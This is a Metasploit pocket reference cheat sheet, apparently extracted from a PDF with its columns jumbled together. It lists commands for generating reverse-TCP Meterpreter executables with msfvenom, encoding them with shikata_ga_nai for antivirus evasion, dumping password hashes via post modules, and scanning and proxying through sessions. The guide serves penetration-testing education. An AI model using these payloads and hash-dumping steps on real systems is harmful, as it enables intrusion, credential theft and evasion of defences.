Metasploit Cheat Sheet

ADVERTISEMENT

Metasploit
Meterpreter Post Modules
msfvenom
Cheat Sheet
With an available Meterpreter session, post modules
The msfvenom tool can be used to generate Metasploit
can be run on the target machine.
payloads (such as Meterpreter) as standalone files and
By
Yori Kvitchko, Tom Hessman, Daniel
optionally encode them. This tool replaces the former
Post Modules from Meterpreter
Pendolino, & Ed Skoudis
msfpayload and msfencode tools. Run with
meterpreter > run post/multi/gather/env
POCKET REFERENCE GUIDE
‘'-l payloads’ to get a list of payloads.
Post Modules on a Backgrounded Session
resources/
$ msfvenom –p [PayloadPath]
–f [FormatType]
msf > use post/windows/gather/hashdump
LHOST=[LocalHost (if reverse conn.)]
msf > show options
Purpose
LPORT=[LocalPort]
msf > set SESSION 1
Example
msf > run
The purpose of this cheat sheet is to
Reverse Meterpreter payload as an executable and
describe some common options for some
redirected into a file:
of the various components of the
Useful Auxiliary Modules
$ msfvenom -p windows/meterpreter/
Metasploit Framework
Port Scanner:
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe
msf > use auxiliary/scanner/portscan/
Format Options (specified with –f)
tcp
Tools Described on This Sheet
--help-formats – List available output formats
msf > set RHOSTS 10.10.10.0/24
exe – Executable
msf > run
Metasploit
pl – Perl
DNS Enumeration
The Metasploit Framework is a development platform
rb – Ruby
msf > use auxiliary/gather/dns_enum
raw – Raw shellcode
for developing and using security tools and exploits.
msf > set DOMAIN target.tgt
c – C code
msf > run
Encoding Payloads with msfvenom
Metasploit Meterpreter
The Meterpreter is a payload within the Metasploit
The msfvenom tool can be used to apply a level of
FTP Server
Framework that provides control over an exploited
encoding for anti-virus bypass. Run with '-l encoders'
msf > use auxiliary/server/ftp
to get a list of encoders.
target system, running as a DLL loaded inside of any
msf > set FTPROOT /tmp/ftproot
process on a target machine.
$ msfvenom -p [Payload] -e [Encoder] -f
msf > run
[FormatType] -i [EncodeInterations]
Proxy Server
Metasploit msfvenom
LHOST=[LocalHost (if reverse conn.)]
The msfvenom tool is a component of the Metasploit
LPORT=[LocalPort]
msf > use auxiliary/server/socks4
msf > run
Example
Framework that allows users to generate a
standalone version of any payload within the
Encode a payload from msfpayload 5 times using shikata-
Any proxied traffic that matches the subnet of a route
framework. Payloads can be generated in a variety
ga-nai encoder and output as executable:
will be routed through the session specified by route.
of formats including executable, Ruby script, and raw
$ msfvenom -p windows/meterpreter/
Use proxychains configured for socks4 to route any
shellcode. The msfvenom tool can also encode
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
application's traffic through a Meterpreter session.
payloads to help avoid detection.
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

ADVERTISEMENT

00 votes

Related Articles

Related forms

Related Categories

Parent category: Education
Go
Page of 2